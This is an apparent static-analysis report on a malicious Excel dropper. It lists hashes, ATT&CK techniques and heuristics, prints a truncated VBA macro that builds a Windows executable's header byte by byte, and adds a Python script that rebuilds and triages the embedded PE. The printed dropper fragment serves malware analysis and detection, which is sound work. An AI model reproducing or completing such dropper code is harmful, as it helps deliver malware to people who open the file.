Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 aafcbdc5174c50ac…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 119.0 KB
Created: 2005-05-02 10:15:57
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: 38acb3540e110ad170e7721de25ca1b3
SHA-1: a6cec3dc5b65cbe593455f569965327227394752
SHA-256: aafcbdc5174c50acb75763363b1b63807022f4138cf09efb85596b0bb5201b99
Risk score: 228

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1059.003 Command and Scripting Interpreter: Windows Command Shell
  • T1204.002 User Execution: Malicious File

The file is an Excel workbook carrying a VBA macro with an Auto_Open entry point, so the code runs as soon as the workbook is opened with macros enabled (T1204.002). The extracted source shows the macro assembling a Win32 executable in memory one byte at a time: InitExe1() fills a Byte array whose first bytes are the MZ signature (x(0) = &H4D, x(1) = &H5A), followed by the DOS stub text "This program cannot be run in DOS mode." at offset 78 and, at offset 128 (the e_lfanew value stored at x(60) = &H80), the PE signature and a COFF header describing an i386 image with three sections. The Shell() call that launches cmd.exe (T1059.003) is consistent with executing that embedded file once the macro has written it to disk; the preview is cut off before that code, so confirm the drop path and the exact command line in the full macros.bas. Environ() is typically used in droppers of this kind to resolve a writable location such as %TEMP%, but the call itself is not in the visible portion. The size of the module (48,294 bytes, almost entirely x(n) = &Hxx assignments) together with the embedded PE points to a dropper rather than a downloader, which matches the ClamAV detection Doc.Dropper.Agent-7623001-0.

Heuristics (6)

  • ClamAV: Doc.Dropper.Agent-7623001-0 (critical, CLAMAV_DETECTION)
    ClamAV signature match: Doc.Dropper.Agent-7623001-0.
  • VBA macros detected (medium, OLE_VBA_MACROS; 4 related findings)
    The document contains VBA macro code.
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    The macro calls the VBA Shell() function, which starts a new process (here cmd.exe).
  • Auto_Open macro (high, OLE_VBA_AUTO)
    An Auto_Open procedure runs automatically when the workbook is opened with macros enabled, with no further user interaction.
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell/download/object-execution tokens. Office stores each module both as compressed source and as compiled p-code, and the p-code is what actually executes when the document was saved by a matching Office version. This rule therefore still fires on documents whose source has been stripped or replaced ("stomped"), or whose source could not be extracted, where the source-based rules above see nothing.
  • Environ() call (env variable access) (low, OLE_VBA_ENVIRON)
    The macro reads environment variables through Environ(), commonly used to locate a writable path such as %TEMP% or %APPDATA% before dropping a file.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 48294 bytes
SHA-256: 9cd923c5522f598e0777a8589f5b1edc406b3b955aa576a757bc05765a9bb80a
Script preview: first 1,000 lines of the extracted script (the listing below is truncated)
Attribute VB_Name = "Modul1"
Dim x(3104) As Byte

Sub InitExe1()
x(0) = &H4D
x(1) = &H5A
x(2) = &H90
x(3) = &H0
x(4) = &H3
x(5) = &H0
x(6) = &H0
x(7) = &H0
x(8) = &H4
x(9) = &H0
x(10) = &H0
x(11) = &H0
x(12) = &HFF
x(13) = &HFF
x(14) = &H0
x(15) = &H0
x(16) = &HB8
x(17) = &H0
x(18) = &H0
x(19) = &H0
x(20) = &H0
x(21) = &H0
x(22) = &H0
x(23) = &H0
x(24) = &H40
x(25) = &H0
x(26) = &H0
x(27) = &H0
x(28) = &H0
x(29) = &H0
x(30) = &H0
x(31) = &H0
x(32) = &H0
x(33) = &H0
x(34) = &H0
x(35) = &H0
x(36) = &H0
x(37) = &H0
x(38) = &H0
x(39) = &H0
x(40) = &H0
x(41) = &H0
x(42) = &H0
x(43) = &H0
x(44) = &H0
x(45) = &H0
x(46) = &H0
x(47) = &H0
x(48) = &H0
x(49) = &H0
x(50) = &H0
x(51) = &H0
x(52) = &H0
x(53) = &H0
x(54) = &H0
x(55) = &H0
x(56) = &H0
x(57) = &H0
x(58) = &H0
x(59) = &H0
x(60) = &H80
x(61) = &H0
x(62) = &H0
x(63) = &H0
x(64) = &HE
x(65) = &H1F
x(66) = &HBA
x(67) = &HE
x(68) = &H0
x(69) = &HB4
x(70) = &H9
x(71) = &HCD
x(72) = &H21
x(73) = &HB8
x(74) = &H1
x(75) = &H4C
x(76) = &HCD
x(77) = &H21
x(78) = &H54
x(79) = &H68
x(80) = &H69
x(81) = &H73
x(82) = &H20
x(83) = &H70
x(84) = &H72
x(85) = &H6F
x(86) = &H67
x(87) = &H72
x(88) = &H61
x(89) = &H6D
x(90) = &H20
x(91) = &H63
x(92) = &H61
x(93) = &H6E
x(94) = &H6E
x(95) = &H6F
x(96) = &H74
x(97) = &H20
x(98) = &H62
x(99) = &H65
x(100) = &H20
x(101) = &H72
x(102) = &H75
x(103) = &H6E
x(104) = &H20
x(105) = &H69
x(106) = &H6E
x(107) = &H20
x(108) = &H44
x(109) = &H4F
x(110) = &H53
x(111) = &H20
x(112) = &H6D
x(113) = &H6F
x(114) = &H64
x(115) = &H65
x(116) = &H2E
x(117) = &HD
x(118) = &HD
x(119) = &HA
x(120) = &H24
x(121) = &H0
x(122) = &H0
x(123) = &H0
x(124) = &H0
x(125) = &H0
x(126) = &H0
x(127) = &H0
x(128) = &H50
x(129) = &H45
x(130) = &H0
x(131) = &H0
x(132) = &H4C
x(133) = &H1
x(134) = &H3
x(135) = &H0
x(136) = &HB4
x(137) = &H83
x(138) = &H57
x(139) = &H42
x(140) = &H0
x(141) = &H0
x(142) = &H0
x(143) = &H0
x(144) = &H0
x(145) = &H0
x(146) = &H0
x(147) = &H0
x(148) = &HE0
x(149) = &H0
x(150) = &HE
x(151) = &H1
x(152) = &HB
x(153) = &H1
x(154) = &H2
x(155) = &H37
x(156) = &H0
x(157) = &H4
x(158) = &H0
x(159) = &H0
x(160) = &H0
x(161) = &H4
x(162) = &H0
x(163) = &H0
x(164) = &H0
x(165) = &H0
x(166) = &H0
x(167) = &H0
x(168) = &H19
x(169) = &H12
x(170) = &H0
x(171) = &H0
x(172) = &H0
x(173) = &H10
x(174) = &H0
x(175) = &H0
x(176) = &H0
x(177) = &H20
x(178) = &H0
x(179) = &H0
x(180) = &H0
x(181) = &H0
x(182) = &H40
x(183) = &H0
x(184) = &H0
x(185) = &H10
x(186) = &H0
x(187) = &H0
x(188) = &H0
x(189) = &H2
x(190) = &H0
x(191) = &H0
x(192) = &H1
x(193) = &H0
x(194) = &H0
x(195) = &H0
x(196) = &H0
x(197) = &H0
x(198) = &H0
x(199) = &H0
x(200) = &H4
x(201) = &H0
x(202) = &H0
x(203) = &H0
x(204) = &H0
x(205) = &H0
x(206) = &H0
x(207) = &H0
x(208) = &H0
x(209) = &H40
x(210) = &H0
x(211) = &H0
x(212) = &H0
x(213) = &H4
x(214) = &H0
x(215) = &H0
x(216) = &H0
x(217) = &H0
x(218) = &H0
x(219) = &H0
x(220) = &H3
x(221) = &H0
x(222) = &H0
x(223) = &H0
x(224) = &H0
x(225) = &H0
x(226) = &H10
x(227) = &H0
x(228) = &H0
x(229) = &H10
x(230) = &H0
x(231) = &H0
x(232) = &H0
x(233) = &H0
x(234) = &H10
x(235) = &H0
x(236) = &H0
x(237) = &H10
x(238) = &H0
x(239) = &H0
x(240) = &H0
x(241) = &H0
x(242) = &H0
x(243) = &H0
x(244) = &H10
x(245) = &H0
x(246) = &H0
x(247) = &H0
x(248) = &H0
x(249) = &H0
x(250) = &H0
x(251) = &H0
x(252) = &H0
x(253) = &H0
x(254) = &H0
x(255) = &H0
x(256) = &H0
x(257) = &H30
x(258) = &H0
x(259) = &H0
x(260) = &H3C
x(261) = &H1
x(262) = &H0
x(263) = &H0
x(264) = &H0
x(265) = &H0
x(266) = &H0
x(267) = &H0
x(268) = &H0
x(269) = &H0
x(270) = &H0
x(271) = &H0
x(272) = &H0
x(273) = &H0
x(274) = &H0
x(275) = &H0
x(276) = &H0
x(277) = &H0
x(278) = &H0
x(279) = &H0
x(280) = &H0
x(281) = &H0
x(282) = &H0
x(283) = &H0
x(284) = &H0
x(285) = &H0
x(286) = &H0
x(287) = &H0
x(288) = &H0
x(289) = &H
... (truncated)
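The preview above shows the dropper's storage format: the executable is not in a separate OLE stream but is spelled out as one x(n) = &Hxx statement per byte, so carving it means replaying those assignments rather than searching the file for an embedded PE. The following script is an added example (not the report's tooling and not part of oletools/olevba): it rebuilds every Dim ... As Byte array from the assignment statements and runs a first-pass PE header triage on the result. SAMPLE_VBA is constructed for this example from the lines visible in the preview: the indices that carry header fields are copied with the values the page shows, and the intervening &H0 assignments are omitted, which changes nothing because unassigned indices of a VBA Byte array are zero. Run it on the complete macros.bas to recover the whole 3,105-byte buffer (and any further InitExe*() routines, if the full module has them; only InitExe1 is visible here), which the truncated preview cannot provide.

```python
import re
import struct
from datetime import datetime, timezone

# Constructed sample for this example: a subset of the lines shown in the
# preview above.  The indices that carry PE header fields keep the values the
# page shows at those positions; the `&H0` assignments in between are omitted,
# which is harmless because unassigned indices of a VBA Byte array are zero.
SAMPLE_VBA = """\
Attribute VB_Name = "Modul1"
Dim x(3104) As Byte

Sub InitExe1()
x(0) = &H4D
x(1) = &H5A
x(2) = &H90
x(60) = &H80
x(128) = &H50
x(129) = &H45
x(132) = &H4C
x(133) = &H1
x(134) = &H3
x(136) = &HB4
x(137) = &H83
x(138) = &H57
x(139) = &H42
x(152) = &HB
x(153) = &H1
x(168) = &H19
x(169) = &H12
x(182) = &H40
x(220) = &H3
End Sub
"""

DIM_RE = re.compile(r"^\s*Dim\s+(\w+)\((\d+)\)\s+As\s+Byte\b", re.M)
ASSIGN_RE = re.compile(r"^\s*(\w+)\((\d+)\)\s*=\s*&H([0-9A-Fa-f]{1,2})\s*$", re.M)

MACHINES = {0x14C: "i386", 0x8664: "x86-64"}
SUBSYSTEMS = {2: "Windows GUI", 3: "Windows console"}


def rebuild_byte_arrays(vba_source):
    """Return {name: bytes} for every `Dim name(N) As Byte` array that the macro
    fills with `name(i) = &Hxx` statements.  VBA bounds are inclusive, so
    `Dim x(3104)` declares 3105 elements; indices never assigned stay zero.
    A truncated statement such as `x(289) = &H` does not match and is skipped."""
    arrays = {name: bytearray(int(upper) + 1) for name, upper in DIM_RE.findall(vba_source)}
    for name, idx, hexval in ASSIGN_RE.findall(vba_source):
        buf = arrays.get(name)
        if buf is None:
            continue  # assignment to something that is not a declared Byte array
        i = int(idx)
        if i >= len(buf):
            raise ValueError(f"{name}({i}) is outside the declared bounds")
        buf[i] = int(hexval, 16)
    return {name: bytes(buf) for name, buf in arrays.items()}


def parse_pe_header(blob):
    """First-pass PE triage: the fields an analyst checks before running anything.
    Returns None when the blob does not start with a well-formed MZ/PE header.
    Offsets follow the PE/COFF specification (COFF header = e_lfanew + 4,
    optional header = COFF header + 20)."""
    if len(blob) < 64 or blob[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", blob, 60)[0]
    coff, opt = e_lfanew + 4, e_lfanew + 24
    if opt + 72 > len(blob) or blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    machine, nsections, timestamp = struct.unpack_from("<HHI", blob, coff)
    magic = struct.unpack_from("<H", blob, opt)[0]        # 0x10B = PE32, 0x20B = PE32+
    entry = struct.unpack_from("<I", blob, opt + 16)[0]   # AddressOfEntryPoint (RVA)
    if magic == 0x10B:
        image_base = struct.unpack_from("<I", blob, opt + 28)[0]
    else:
        image_base = struct.unpack_from("<Q", blob, opt + 24)[0]  # PE32+ has no BaseOfData
    subsystem = struct.unpack_from("<H", blob, opt + 68)[0]
    return {
        "machine": machine,
        "machine_name": MACHINES.get(machine, hex(machine)),
        "sections": nsections,
        "compiled": datetime.fromtimestamp(timestamp, tz=timezone.utc),
        "pe32": magic == 0x10B,
        "entry_point": entry,
        "image_base": image_base,
        "subsystem": subsystem,
        "subsystem_name": SUBSYSTEMS.get(subsystem, str(subsystem)),
    }


def triage_vba(vba_source):
    """Rebuild every Byte array in the macro and triage those that parse as PE files."""
    return {name: parse_pe_header(blob) for name, blob in rebuild_byte_arrays(vba_source).items()}


if __name__ == "__main__":
    for name, header in triage_vba(SAMPLE_VBA).items():
        print(name, header)
```

On the page's own bytes the header decodes as an i386 PE32 console image with three sections, entry point RVA 0x1219 at image base 0x400000, and a COFF timestamp of 2005-04-09 07:26:44 UTC, a few weeks before the workbook's Created date of 2005-05-02. Compile timestamps are trivially forged, so treat the agreement as corroborating, not conclusive. When the parser has the full module, hash the rebuilt buffer (hashlib.sha256) and pivot on that value rather than on the document hash, since the same embedded executable is often re-wrapped in many documents.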